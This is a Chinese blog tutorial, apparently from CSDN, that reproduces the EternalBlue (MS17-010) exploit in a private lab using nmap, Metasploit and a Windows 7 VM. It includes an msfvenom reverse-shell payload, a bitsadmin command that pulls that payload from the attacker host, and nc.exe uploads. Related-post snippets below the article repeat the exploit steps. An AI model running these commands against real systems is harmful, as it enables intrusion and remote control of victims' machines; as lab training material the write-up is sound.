永恒之蓝漏洞复现(详细版)

已于 2024-03-20 23:39:10 修改
阅读量5.1k 收藏 58
点赞数 27
文章标签: windows 安全 网络安全
于 2024-03-20 23:35:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zqinglele/article/details/136868378
版权

一、漏洞原理

  1. 永恒之蓝(Eternal Blue)是一种利用Windows系统的SMB协议处理SMB v1请求时发生的漏洞来获取系统的最高权限,以此来达到控制目标计算机的目的。通过永恒之蓝漏洞会扫描445文件共享端口的Windows机器,无需用户任何操作只要开机上网,就能被植入恶意程序。由此不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全球范围内遭受到病毒的攻击。
  2. SMB(Server Message Block)是一个协议服务器信息块,是一种客户机/服务器、请求/相应协议,通过SMB协议可以在计算机间共享文件等资源。SMB协议工作在应用层和会话层,可以用在TCP/IP协议上,使用TCP139和445端口

二、环境配置

1.虚拟机环境

        1)攻击机:kali linux(192.168.154.252)

        镜像文件下载:https://developer.aliyun.com/mirror/

         2) 渗透靶机: Windows 7(192.168.154.140)

2.matesploit框架

        matesploit框架(Matesploit Framework,MSF)是一个开源工具,由Ruby程序语言编写的模块化框架,主要为后端提供用来测试的端口(如控制台、Web、CLI)。常用为控制台接口,通过该接口可以访问matesploit框架的所有插件(如payloads、利用模块、post模块等),还可使用第三方程序的插件(如sqlmap、nmap等)。

1.检查更新:

  • apt update
  • apt install metasploit-framework

  目前最新版本

2.进入攻击框架:msfconsole

三、复现过程

1.信息收集

  • nmap -sT -sC -sV -O 192.168.154.250 -p 0-65535

# -sT:TCP全连接扫描

# -sC:使用内置脚本进行扫描

# -sV:识别服务版本

# -O:识别系统

# -P:指定端口扫描(0-65535为全端口)

 发现445端口是打开的(一般139端口是不开的)

下面是一些脚本漏洞编号

搜索版本漏洞的方法:

1.searchsploit  xxxx(eg:IIS,Apache)

2.进入MSF模块后search

3.上网搜索

2.尝试攻击

  • search ms17-010

发现以下模块:

1:exploits—漏洞利用攻击模块
2:auxiliary—辅助扫描漏洞模块

0-4中如何选择?先选择扫描模块检测漏洞是否存在(2或3)

0:让靶机变蓝屏

1:用于主机横向渗透

4:SMB远程代码执行

3.使用扫描模块

        1)use 2

主要看需要配置的地方(yes)

需要配置的有点多,重新选择一个

        2)扫描:use 3

这下只需配置靶机IP地址、命名的管道、端口、线程数(后三个已经配置好了)

设置靶机IP地址:

运行一下

        3)连接失败问题

这里出现了问题:Host does NOT appear vulnerable

1.检查防火墙是否关闭

2.检查远程连接是否开启

3.卸载更新的补丁至下面三个即可(没安装vmware tools)

        4)重新运行

成功发现可利用漏洞ms17-010,,扫描模块结束,接下尝试进行攻击

4.攻击:use 0

更改靶机地址:

查看反弹shell 的语句:

查看支持攻击的目标:

运行一下,成功拿下靶机

让靶机弹出计算器:

有弹窗出现

查看不同漏洞模块:

尝试运行一个:screenshare—实时监控当前主机界面

5.进行渗透

        1)查看IP

发现出现是乱码

修改编码格式:

接下来看是没有问题的

        2)文件上传

在绝对路径下创建一个文档

将该文件上传到靶机中

查看是否上传成功

发现上传的文档,成功

6.后渗透模块

post模块可以实现提权、扫描探测等等

随便选择一个看一下

其他功能都在MSF中,感兴趣自己可以尝试。

7.上传木马

1.msfvenom

这里用到生成木马工具:msfvenom,然后使用msfconcole进行监听

  • msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.154.252 port=4444 -f exe -o /tmp/shell.exe

# -p payloads,反弹shell的语句

# -f 生成文件的格式

# -o 生成文件的路径

进入/tmp目录下看到生成的文件

反弹shell

(1)开启一个web服务

(2)使用工具生成反弹shell语句,在靶机看能否下载成功

bitsadmin /rawreturn /transfer getfile "http://192.168.154.252:9999/shell.exe" C:\\shell.exe

这里出现问题了,我搜索了一圈也没找到解决办法,只能换一种工具

2.nc(NetCat)

MSF上传nc到靶机的c盘下

upload /usr/share/windows-binaries/nc.exe  C:\\Windows

在靶机上看一下文件成功上传,这样就可以使用nc连接靶机

季柳东
关注
基础渗透测试实验—永恒之蓝漏洞复现
G6_12的博客
06-08 4292
ms17-010,永恒之蓝漏洞复现
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验
2401_84297796的博客
05-03 1624
6、这个选项的用处主要是渗透攻击成功后目标机与LHOST建立的Shell连接,所以LHOST参数设置我们自己本地的IP地址,RHOSTS参数还是目标IP。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
永恒之蓝漏洞复现(ms17-010)
热门推荐
weixin_43913009的博客
04-01 2万+
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、永恒之蓝(Eternal Blue)二、复现环境三、复现过程1.主机发现2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、永恒之蓝(Eternal Blue) 永恒之蓝是在 Windows 的SMB服务处理SMB v1请求时发生的漏.
永恒之蓝(ms17-010) 漏洞复现
最新发布
2301_78611138的博客
03-14 285
这是一款免费的,可下载的框架,通过它可以很容易的获取,开发并对计算机软件漏洞实现攻击。其本身附带数千个已知软件漏洞漏洞攻击工具。
我眼中的永恒之蓝漏洞复现
ovowovo的博客
11-29 345
靶机:Windows 2003 ip 192.168.0.167 攻击机:kali ip 192.168.0.159 1.两台机子需要互相ping通 在这里插入图片描述 在这里插入图片描述 2.启动msfconsole,每次出现的图都不同不必在意,直接输msfconsole命令即可出现下图msf>即为开启 在这里插入图片描述 3.搜索漏洞,命令 search ms17_010 在这里插图片...
永恒之蓝漏洞复现
m0_74763043的博客
12-02 726
永恒之蓝 ms17_010漏洞
复现永恒之蓝
qq_45956062的博客
12-07 2041
SMB(Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源;永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。首先我们关闭win7的防火墙,不关闭防火墙后续操作可能存在问题(有可能nmap扫描不到其端口,MSF利用不了永恒之蓝漏洞)(1)用kali中的nmap 扫描网段做主机发现。
Windows 2008永恒之蓝漏洞利用与后渗透测试详解
09-23
具体涉及nmap命令实施的端口和服务枚举以及利用永恒之蓝漏洞(MS17-010 EternalBlue)取得目标主机管理访问,最终展示了在已攻破的目标环境中进一步行动的步骤和技术手段。适用于希望了解Windows操作系统特定远程...
Kali--永恒之蓝漏洞复现
f1245179815的博客
10-24 1086
该模块用于发现被漏洞影响的 Windows主机,以及执行命令,可以通过提供的选项进行数据包分析,或可选通道溢出使用,以获得远程命令执行的权限。该模块用于发现被漏洞影响的 Windows主机,以及执行命令,可以通过提供的选项进行数据包分析,或可选通道溢出使用,以获得远程命令执行的权限。该模块用于利用MS17-010漏洞实现远程执行代码,可以覆盖掉目标计算机的内存地址,从而实现攻击者的恶意代码在被攻击计算机上的执行。当目标机开机,程序后台运行,且监听端口为7777,这个端口可以自己设置。
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验(1)
2401_84297796的博客
05-03 1028
1、msfconsole进入MSF模式,再测试能不能ping通目标主机(192.168.164.129),用nmap扫描主机开放445端口,接下用msf测试一下漏洞是否存在。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
网络安全必学渗透测试流程
qq_44005305的博客
02-12 703
无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整的视频已经上传至CSDN官方,朋友们如果需要可以点击这个链接免费领取。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。1、第二步骤的时候检测到目标存在该漏洞,现在我们开始进行渗透。
永恒之蓝全过程复现
Zhaokangkang123的博客
02-09 7090
详细永恒之蓝复现教程
永恒之蓝--漏洞复现.
qq_44640313的博客
11-27 151
永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
永恒之蓝复现
weixin_43781139的博客
11-28 1530
re狗偶尔玩一玩渗透还是比较有意思的,今天来复现一下ms17_010 靶机:win7 攻击机:kali 首先查看一下两台机器的IP win7: kali: 同时在win7下cmd执行gpedit.msc,然后对应下列路径改为已禁用,注意要重启! 来到kali打开msf 寻找17010相关模块 用use auxiliary/scanner/smb/smb_ms17_010检测一下漏洞 设置一下目标ip,run就行了 这样显示就是可以了。 我们常用的是 au
永恒之蓝漏洞复现ubuntu
12-06
永恒之蓝(EternalBlue)是一个严重的安全漏洞,最初由美国国家安全局(NSA)发现,后来被黑客组织Shadow Brokers泄露。永恒之蓝利用了Windows SMB服务中的一个漏洞,允许攻击者远程执行代码。为了复现永恒之蓝漏洞在Ubuntu系统上的影响,通常需要设置一个实验环境。以下是复现永恒之蓝漏洞的基本步骤: ### 环境准备 1. **安装虚拟机**:使用VirtualBox或VMware安装两台虚拟机,一台运行Ubuntu,另一台运行Windows(建议使用Windows 7或Windows Server 2008,因为这些本更容易受到永恒之蓝攻击)。 2. **网络配置**:确保两台虚拟机在同一局域网内,可以互相通信。 ### 步骤 1. **安装必要的软件**: - 在Ubuntu上安装Metasploit框架: ```bash sudo apt update sudo apt install metasploit-framework ``` - 在Windows虚拟机上禁用防火墙和防病毒软件,以确保攻击能够成功。 2. **启动Metasploit**: ```bash msfconsole ``` 3. **搜索永恒之蓝模块**: ```bash search eternalblue ``` 4. **使用永恒之蓝模块**: ```bash use exploit/windows/smb/ms17_010_eternalblue ``` 5. **设置目标IP和本地IP**: ```bash set RHOST <Windows虚拟机IP> set LHOST <Ubuntu虚拟机IP> ``` 6. **选择Payload**: ```bash set PAYLOAD windows/x64/meterpreter/reverse_tcp ``` 7. **执行攻击**: ```bash exploit ``` ### 结果 如果攻击成功,你将获得一个Meterpreter会话,可以远程执行命令和控制目标Windows系统。 ### 注意事项 - **法律和道德**:复现漏洞仅用于学习和研究目的,禁止在未经授权的系统上使用。 - **安全性**:在实际环境中,确保系统已安装最新的安全补丁,以防止此类漏洞被利用。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值